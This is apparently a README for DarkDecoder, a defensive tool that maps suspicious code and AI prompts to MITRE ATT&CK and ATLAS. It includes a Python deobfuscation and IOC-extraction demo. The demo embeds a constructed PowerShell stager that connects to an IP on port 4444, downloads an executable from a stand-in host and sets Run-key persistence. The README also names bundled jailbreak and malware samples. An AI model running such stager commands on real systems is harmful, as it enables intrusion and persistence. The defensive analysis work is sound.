Dual-Framework Cyber Threat Intelligence Platform
Paste suspicious code or AI inputs. Get instant threat intelligence mapped to MITRE ATT&CK and MITRE ATLAS in under 20 seconds.
DarkDecoder is a free tool that combines two MITRE threat frameworks in a single platform: MITRE ATT&CK for traditional malware and MITRE ATLAS for AI/ML adversarial threats.
Security analysts spend hours manually cross-referencing malicious code against threat databases. DarkDecoder does it in under 20 seconds: paste code or a suspicious prompt and get a full breakdown (danger score, technique mappings, IOCs, kill chain, remediation steps, and exportable reports). Two caveats before relying on it: every submission is sent to the Groq API, so only paste samples you are permitted to share with a third party, and the mappings are produced by an LLM, so verify technique IDs against the ATT&CK and ATLAS pages before they go into a report.
MITRE ATLAS coverage: 40+ techniques across 13 tactics, including LLM-specific techniques such as prompt injection, jailbreak, meta-prompt extraction, plugin compromise, and LLM data leakage.
- Deobfuscates base64, hex, eval chains, string concatenation
- Classifies malware type: Ransomware, Keylogger, Reverse Shell, Cryptominer, Webshell, and more
- Danger score 1–10 with full justification
- Maps to MITRE ATT&CK T-codes (T1059, T1547, T1486, etc.)
- Extracts IOCs: IPs, domains, URLs, file paths, registry keys, mutexes
- Plain English summary for non-technical stakeholders
- Actionable remediation steps
- 40+ ATLAS techniques across the 13 ATLAS tactics, including Reconnaissance, Resource Development, Initial Access, ML Model Access, Execution, Persistence, ML Attack Staging, Defense Evasion, Discovery, Collection, Exfiltration, and Impact
- Detects LLM-specific attacks: prompt injection (AML.T0051), jailbreak (AML.T0054), meta-prompt extraction (AML.T0056), plugin compromise (AML.T0053), LLM data leakage (AML.T0057)
- Flags training data poisoning, backdoor insertion, model extraction, membership inference
- Identifies ML supply chain attacks and surrogate model construction
- Dual-Framework mode: run both ATLAS + ATT&CK on the same input when code targets ML infrastructure
- Full 10-phase ATT&CK kill chain visualization
- Weaponization score + stealth rating (1–10)
- Privilege escalation level: None → Local → Admin → Domain Admin → SYSTEM/Root
- Detection difficulty rating + CVSS vector string generation
- Named APT group / threat actor similarity matching (similarity of tradecraft only, not evidence-based attribution)
- Full attack narrative from an adversary perspective
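The deobfuscation and IOC-extraction bullets above describe the first two stages of the malware scanner. The following is an added example written for this page, not code from DarkDecoder's own `analyzer.py`: it folds `"a" + "b"` string concatenation, peels hex and base64 layers until nothing decodes further, records the eval-style markers seen on the way down, and then pulls IPs, URLs, domains, file paths, registry keys and mutex names out of the result. The PowerShell stager it analyses is constructed inline (not a real sample), and the TLD allowlist and the mutex-call patterns are assumptions chosen for the demo.

```python
import base64
import binascii
import re

# Constructed demo input (not a real malware sample): an inner PowerShell stager
# carrying the IOCs, wrapped in base64, then hex, then split across "+" string
# concatenation, the way droppers commonly hide a payload.
INNER = (
    r'$c = New-Object System.Net.Sockets.TCPClient("198.51.100.23", 4444)' "\n"
    r'Invoke-WebRequest "http://update-cdn.example.com/u/svc.exe" -OutFile "C:\Users\Public\svc.exe"' "\n"
    r'Set-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name svc -Value "C:\Users\Public\svc.exe"' "\n"
    r'$m = New-Object System.Threading.Mutex($false, "Global\svc-7f3a")' "\n"
)
LAYER1 = ('IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("%s")))'
          % base64.b64encode(INNER.encode()).decode())
HEX = LAYER1.encode().hex()
SAMPLE = ('$h = "%s" + "%s" + "%s"\n' % (HEX[:50], HEX[50:120], HEX[120:])
          + "IEX(-join(($h -split '(..)' | ? {$_}) | % {[char][Convert]::ToInt32($_,16)}))\n")

CONCAT_RE = re.compile(r'"([^"]*)"\s*[+.]\s*"([^"]*)"')   # "a" + "b" (PowerShell/JS/Python) or "a" . "b" (PHP)
HEX_RE = re.compile(r'\b(?:[0-9a-fA-F]{2}){10,}\b')       # runs of 20+ hex digits
B64_RE = re.compile(r'(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{20,}={0,2}(?![A-Za-z0-9+/=])')
EVAL_RE = re.compile(r'\b(?:IEX|Invoke-Expression|eval|exec|base64_decode|FromBase64String|fromhex)\b', re.I)

def _textual(raw):
    """Decoded text if the bytes are printable UTF-8, else None: rejects random matches of the regexes."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if text and all(c.isprintable() or c in "\r\n\t" for c in text) else None

def _try_hex(token):
    try:
        return _textual(bytes.fromhex(token))
    except ValueError:
        return None

def _try_b64(token):
    try:
        return _textual(base64.b64decode(token + "=" * (-len(token) % 4), validate=True))
    except (binascii.Error, ValueError):
        return None

def deobfuscate(text, max_layers=8):
    """Fold concatenated fragments, then decode hex/base64 in place until nothing changes.
    Returns (final_text, layers): layers[0] is the input, each later entry one peeled layer."""
    layers = [text]
    for _ in range(max_layers):
        cur, prev = layers[-1], None
        while prev != cur:  # "a" + "b" + "c" folds one join per pass, so loop to a fixed point
            prev, cur = cur, CONCAT_RE.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), cur)
        nxt = HEX_RE.sub(lambda m: _try_hex(m.group(0)) or m.group(0), cur)
        if nxt == cur:  # hex first: hex digits are also valid base64 characters
            nxt = B64_RE.sub(lambda m: _try_b64(m.group(0)) or m.group(0), cur)
        if nxt == cur:
            break
        layers.append(nxt)
    return layers[-1], layers

def eval_markers(layers):
    """Eval-chain evidence: every interpreter/decoder call seen in any layer."""
    return sorted({m.group(0) for layer in layers for m in EVAL_RE.finditer(layer)})

IOC_RES = {
    "ipv4": re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b'),
    "url": re.compile(r'\bhttps?://[^\s"\'<>)]+'),
    # Assumption: a small TLD allowlist keeps identifiers like System.Net.Sockets out of the domain list.
    "domain": re.compile(r'\b(?:[a-z0-9-]+\.)+(?:com|net|org|io|ru|xyz|top|info|biz)\b'),
    "file_path": re.compile(r'(?<![A-Za-z])[A-Za-z]:\\(?:[^\\\s"\'<>|]+\\)*[^\\\s"\'<>|]+'),
    "registry_key": re.compile(r'\b(?:HKLM|HKCU|HKCR|HKU|HKCC|HKEY_[A-Z_]+):?(?:\\[^\\\s"\'<>]+)+'),
    # Assumption: Win32 CreateMutex{A,W} and .NET System.Threading.Mutex are the mutex-creating calls.
    "mutex": re.compile(r'(?:CreateMutex[AW]?|Threading\.Mutex)\s*\([^)]*?["\']([^"\']+)["\']\s*\)'),
}

def extract_iocs(text):
    """Return {kind: sorted unique IOCs}; IPv4 hits are range-checked so 300.1.1.1-style junk is dropped."""
    found = {}
    for kind, rx in IOC_RES.items():
        hits = set(rx.findall(text))
        if kind == "ipv4":
            hits = {ip for ip in hits if all(int(o) <= 255 for o in ip.split("."))}
        found[kind] = sorted(hits)
    return found

def defang(ioc):
    """Render a network IOC so it cannot be clicked or resolved by accident."""
    return ioc.replace("http", "hxxp").replace(".", "[.]")

if __name__ == "__main__":
    final, layers = deobfuscate(SAMPLE)
    print("layers peeled:", len(layers) - 1, "| eval markers:", eval_markers(layers))
    for kind, values in extract_iocs(final).items():
        for v in values:
            print("%-13s %s" % (kind, defang(v) if kind in ("ipv4", "url", "domain") else v))
```

The printability check in `_textual` is what keeps the decoder honest: long hex runs also satisfy the base64 alphabet and vice versa, so a candidate is only replaced when it decodes to clean text, and hex is tried first because a hex string is always a base64-shaped token but not the other way round. Network IOCs are defanged on output so a copied report line cannot become an accidental beacon.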
| Feature | Details |
|---|---|
| File Upload | .py .js .php .ps1 .sh .bat .rb .go .cs .vbs (up to 200 MB) |
| Report Export | PDF · JSON · TXT (one click, all modules) |
| Attack Timeline | Step-by-step progression with MITRE technique IDs |
| Session History | All scans logged with timestamps in sidebar |
| Hash Analysis | SHA256 + MD5 computed on every submission |
| Built-in Samples | Pre-loaded demo payloads including GCG suffix + Crescendo escalation |
| Zero Cost | Runs on Groq's free API tier (no credit card required) |
| ATLAS Depth | 40+ techniques, 13 tactics, tactic name shown per technique |
| Component | Technology |
|---|---|
| AI Engine | Groq API (llama-3.3-70b-versatile) |
| Threat Framework 1 | MITRE ATT&CK v14 |
| Threat Framework 2 | MITRE ATLAS v4 (AI/ML adversarial threats) |
| Backend | Python 3.10+ |
| Frontend | Streamlit |
| PDF Generation | fpdf2 |
| Environment | python-dotenv |
```bash
# 1. Clone
git clone https://github.com/Pyhroff/darkdecoder
cd darkdecoder
# 2. Install dependencies
pip install -r requirements.txt
# 3. Add your free Groq API key
cp .env.example .env
# Open .env and set: GROQ_API_KEY=your_key_here
# 4. Run
streamlit run app.py
```
Get a free Groq API key at console.groq.com (no credit card; the free tier allows 14,400 requests/day). Keep the key in `.env` only and make sure `.env` stays listed in `.gitignore` so it is never committed.
| Module | Sample Payloads |
|---|---|
| Malware Scanner | PowerShell Dropper · Python Reverse Shell · JS Cryptominer · PHP Webshell · Ransomware Stub |
| AI Threat Analyzer | Prompt Injection · Data Poisoning · Model Extraction · Jailbreak · GCG Adversarial Suffix · Crescendo Escalation |
| Red Team Intel | Privilege Escalation Β· Lateral Movement Β· Defense Evasion Β· C2 Beacon |
| Capability | DarkDecoder | VirusTotal | Traditional SIEMs |
|---|---|---|---|
| MITRE ATT&CK mapping | ✅ | Partial | ✅ (paid) |
| MITRE ATLAS (AI threats) | ✅ 40+ techniques | ❌ | ❌ |
| Red team kill chain | ✅ | ❌ | ❌ |
| LLM-specific attacks | ✅ | ❌ | ❌ |
| Free tier | ✅ | ✅ (public API) | ❌ |
| Self-hostable | ✅ | ❌ | ✅ (paid) |
```text
darkdecoder/
├── app.py                 # Main Streamlit UI (3 modules + dual-framework mode)
├── analyzer.py            # MITRE ATT&CK malware scanner
├── ai_analyzer.py         # MITRE ATLAS v4 AI threat detector (40+ techniques)
├── redteam_analyzer.py    # Red team kill chain analyzer
├── report_generator.py    # PDF report generation
├── requirements.txt
├── .env.example
└── .gitignore
```
DarkDecoder is part of a three-project AI security portfolio:
| Project | Role | Frameworks |
|---|---|---|
| DarkDecoder | Threat intelligence: what is the attack? | MITRE ATT&CK + ATLAS |
| PromptStrike | Active red teaming: can you jailbreak it? | PAIR · TAP · Crescendo · GCG |
| SOC PARALLAX | Behavioral defense: detect the attacker | Neo4j · LangGraph · Ollama |
MIT License: free to use, modify, and deploy.
DarkDecoder: because malware doesn't explain itself.